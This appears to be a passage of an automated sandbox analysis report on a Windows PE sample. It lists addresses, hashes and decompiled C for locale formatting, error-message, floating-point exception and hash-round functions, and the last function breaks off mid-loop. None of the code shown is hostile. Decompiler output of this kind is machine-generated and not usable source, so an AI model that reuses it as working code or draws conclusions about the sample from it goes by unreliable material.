                            0x00a0c509
                            0x00a0c50c
                            0x00a0c50c
                            0x00a0c514
                            0x00a0c51b
                            0x00a0c51c
                            0x00a0c51e
                            0x00a0c520
                            0x00a0c522
                            0x00a0c525
                            0x00a0c530
                            0x00a0c530
                            0x00a0c536
                            0x00a0c536
                            0x00a0c539
                            0x00a0c53a
                            0x00a0c53a
                            0x00a0c530
                            0x00a0c53e
                            0x00a0c540
                            0x00a0c542
                            0x00a0c544
                            0x00a0c544
                            0x00a0c546
                            0x00a0c54a
                            0x00000000
                            0x00000000
                            0x00a0c54c
                            0x00a0c54c
                            0x00a0c54f
                            0x00a0c551
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0c551
                            0x00a0c544
                            0x00a0c553
                            0x00a0c55d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0c268
                            0x00a0c0f2
                            0x00a0c0f2
                            0x00a0c0f2
                            0x00a0c0f5
                            0x00a0c0f8
                            0x00a0c0fb
                            0x00a0c12c
                            0x00a0c12e
                            0x00a0c179
                            0x00a0c17b
                            0x00a0c182
                            0x00a0c189
                            0x00a0c18c
                            0x00a0c18f
                            0x00a0c195
                            0x00a0c195
                            0x00a0c196
                            0x00a0c199
                            0x00a0c1a0
                            0x00a0c1a9
                            0x00a0c1ae
                            0x00a0c1b1
                            0x00a0c1b6
                            0x00a0c1b9
                            0x00a0c1bb
                            0x00a0c1c0
                            0x00a0c1c3
                            0x00a0c1c6
                            0x00a0c1c6
                            0x00a0c1c6
                            0x00a0c1ca
                            0x00a0c1cd
                            0x00a0c1cd
                            0x00a0c1d2
                            0x00a0c1d2
                            0x00a0c1dd
                            0x00a0c1e8
                            0x00a0c1e8
                            0x00a0c1eb
                            0x00a0c1f7
                            0x00a0c1fc
                            0x00a0c207
                            0x00a0c209
                            0x00a0c20b
                            0x00a0c211
                            0x00a0c216
                            0x00a0c218
                            0x00a0c21e
                            0x00a0c130
                            0x00a0c13c
                            0x00a0c13c
                            0x00a0c13f
                            0x00a0c14f
                            0x00a0c155
                            0x00a0c15c
                            0x00a0c15e
                            0x00a0c166
                            0x00a0c168
                            0x00a0c16a
                            0x00a0c16f
                            0x00a0c172
                            0x00a0c178
                            0x00a0c178
                            0x00a0c0fd
                            0x00a0c100
                            0x00a0c104
                            0x00a0c10a
                            0x00a0c119
                            0x00a0c123
                            0x00a0c12b
                            0x00a0c12b
                            0x00a0c0fb
                            0x00a0c0d6
                            0x00a0c0d9
                            0x00a0c0df
                            0x00a0c0df
                            0x00a0c0c5
                            0x00a0c0cb
                            0x00a0c0cb

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                            • Instruction ID: 83930e742a8a9c524c907ce51fd7f2995bfa3d691cb8067862f4ca0b0cf7c2b8
                            • Opcode Fuzzy Hash: 0e50bbf9e4776493f77c5540494787f02e85b2eba5f0c0a8ffb8a0a8bb63874f
                            • Instruction Fuzzy Hash: 7E022D71E002199BDF14CFA9D9946ADF7F1FF88324F258269D919EB380D731AA41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9D99, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009F9D99(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xa1d610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xa3de30 = _v304;
					 *0xa3de32 = 0;
					 *0xa1d610 = 0xa3de30;
				}
				E009EF980(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xa1d600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                            0x009f9db1
                            0x009f9dbf
                            0x009f9dcc
                            0x009f9dd4
                            0x009f9dda
                            0x009f9dda
                            0x009f9df0
                            0x009f9df5
                            0x009f9dfa
                            0x009f9e04
                            0x009f9e0e
                            0x009f9e16
                            0x009f9e21

                            APIs
                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 009F9DBF
                            • GetNumberFormatW.KERNEL32 ref: 009F9E0E
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FormatInfoLocaleNumber
                            • String ID:
                            • API String ID: 2169056816-0
                            • Opcode ID: f036a40cb219d6f3525430da789fddabec32965407a73203f46c717ca7d22493
                            • Instruction ID: cdd7c55ca8b16d7071b1bddd3e81f96c0ce0e4d238a6c8087c985840e89013a2
                            • Opcode Fuzzy Hash: f036a40cb219d6f3525430da789fddabec32965407a73203f46c717ca7d22493
                            • Instruction Fuzzy Hash: CD017135510218BAD710DFA4EC45FEB77BCEF49710F108526FA5897150D370992587A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E6D06, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E009E6D06(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





                            0x009e6d06
                            0x009e6d0e
                            0x00000000
                            0x009e6d35
                            0x009e6d27
                            0x009e6d2f
                            0x00000000

                            APIs
                            • GetLastError.KERNEL32(009F0DE0,?,00000200), ref: 009E6D06
                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 009E6D27
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: f4fbd0f5abd8a524ca1dc416f9286284959d66b3b0ec98a3421fdb6a6d454c30
                            • Instruction ID: 8a03e43f51b2cd6f631401d77d60960d58f2c24f39b9b1bab3c31f402254951d
                            • Opcode Fuzzy Hash: f4fbd0f5abd8a524ca1dc416f9286284959d66b3b0ec98a3421fdb6a6d454c30
                            • Instruction Fuzzy Hash: FCD0A7343C43027EFA114A708C05FA63754B729BC2F10CA047303D80D1C570C825D71C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A10654, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A10654(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00A0DFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00A0DF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                            0x00a10662
                            0x00a10669
                            0x00a1066e
                            0x00a10674
                            0x00a10677
                            0x00a1067d
                            0x00a10682
                            0x00a10687
                            0x00a10687
                            0x00a1068d
                            0x00a10692
                            0x00a10697
                            0x00a10697
                            0x00a1069e
                            0x00a106a3
                            0x00a106a8
                            0x00a106a8
                            0x00a106af
                            0x00a106b4
                            0x00a106b9
                            0x00a106b9
                            0x00a106c0
                            0x00a106c5
                            0x00a106ca
                            0x00a106ca
                            0x00a106d2
                            0x00a106e2
                            0x00a106f4
                            0x00a10706
                            0x00a10719
                            0x00a1072b
                            0x00a10733
                            0x00a10738
                            0x00a1073d
                            0x00a1073d
                            0x00a10744
                            0x00a10749
                            0x00a10749
                            0x00a10750
                            0x00a10755
                            0x00a10755
                            0x00a1075c
                            0x00a10761
                            0x00a10761
                            0x00a10768
                            0x00a1076d
                            0x00a1076d
                            0x00a10777
                            0x00a10779
                            0x00a107b3
                            0x00a1077b
                            0x00a10780
                            0x00a107a4
                            0x00a107ac
                            0x00a107a0
                            0x00a107a0
                            0x00a107b6
                            0x00a107bd
                            0x00a107bf
                            0x00a107e1
                            0x00a107e9
                            0x00a107ec
                            0x00a107ec
                            0x00a107ee
                            0x00a107ee
                            0x00a107f9
                            0x00a107ff
                            0x00a10804
                            0x00a1080b
                            0x00a10845
                            0x00a10850
                            0x00a10856
                            0x00a10859
                            0x00a1085c
                            0x00a10868
                            0x00a10870
                            0x00a1080d
                            0x00a10810
                            0x00a1081c
                            0x00a10822
                            0x00a10828
                            0x00a1082b
                            0x00a10834
                            0x00a10834
                            0x00a10873
                            0x00a10881
                            0x00a10887
                            0x00a1088e
                            0x00a10890
                            0x00a10890
                            0x00a10897
                            0x00a10899
                            0x00a10899
                            0x00a108a0
                            0x00a108a2
                            0x00a108a2
                            0x00a108a9
                            0x00a108ab
                            0x00a108ab
                            0x00a108b2
                            0x00a108b4
                            0x00a108b4
                            0x00a108c1
                            0x00a108c4
                            0x00a108fb
                            0x00a108c6
                            0x00a108c6
                            0x00a108c9
                            0x00a108f4
                            0x00a108e9
                            0x00a108e9
                            0x00a108fd
                            0x00a10905
                            0x00a10908
                            0x00a10927
                            0x00a1092c
                            0x00a1092c
                            0x00a1092e
                            0x00a10933
                            0x00a1093f
                            0x00a10935
                            0x00a10938
                            0x00a10938
                            0x00a10944
                            0x00a10944
                            0x00a1090a
                            0x00a1090d
                            0x00a1091c
                            0x00000000
                            0x00a1091c
                            0x00a1090f
                            0x00a10912
                            0x00a10914
                            0x00a10914
                            0x00000000
                            0x00a10912
                            0x00a108cb
                            0x00a108ce
                            0x00a108e4
                            0x00000000
                            0x00a108e4
                            0x00a108d3
                            0x00a108d5
                            0x00a108d5
                            0x00a108d3
                            0x00000000
                            0x00a108c4
                            0x00a107c6
                            0x00a107d4
                            0x00a107dc
                            0x00000000
                            0x00a107dc
                            0x00a107ca
                            0x00a107cf
                            0x00a107cf
                            0x00000000
                            0x00a107ca
                            0x00a10787
                            0x00a10795
                            0x00a1079d
                            0x00000000
                            0x00a1079d
                            0x00a1078b
                            0x00a10790
                            0x00a10790
                            0x00a1078b

                            APIs
                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A1064F,?,?,00000008,?,?,00A102EF,00000000), ref: 00A10881
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionRaise
                            • String ID:
                            • API String ID: 3997070919-0
                            • Opcode ID: af1dce4d0613ffb68c628af85b3a41822d1904b05f8b043ceb8ed720a4b7f97c
                            • Instruction ID: 184b425e578bb8add1f74c3d9634d56eb6aa56ba2afd13a10e9079149684168b
                            • Opcode Fuzzy Hash: af1dce4d0613ffb68c628af85b3a41822d1904b05f8b043ceb8ed720a4b7f97c
                            • Instruction Fuzzy Hash: F2B13835610608DFD719CF28C58ABA57BA0FF45364F298658E8D9CF2A2C3B5E9D1CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E3EAD, Relevance: 1.6, Strings: 1, Instructions: 332COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 81%
                            			E009E3EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xa123b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xa123b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xa123b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xa123b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xa123b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xa123b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xa123b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xa123b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xa123b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xa123b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xa123ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xa123bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xa123bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
